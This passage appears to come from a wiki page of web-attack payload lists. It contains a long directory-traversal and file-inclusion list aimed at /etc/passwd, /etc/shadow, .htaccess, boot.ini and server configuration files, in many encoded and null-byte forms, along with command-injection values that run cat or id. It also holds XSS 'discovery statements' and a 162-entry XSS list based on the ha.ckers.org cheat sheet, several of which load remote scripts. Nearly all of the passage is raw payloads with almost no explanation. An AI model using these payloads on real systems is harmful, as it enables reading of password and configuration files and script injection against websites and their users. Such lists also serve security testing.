%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
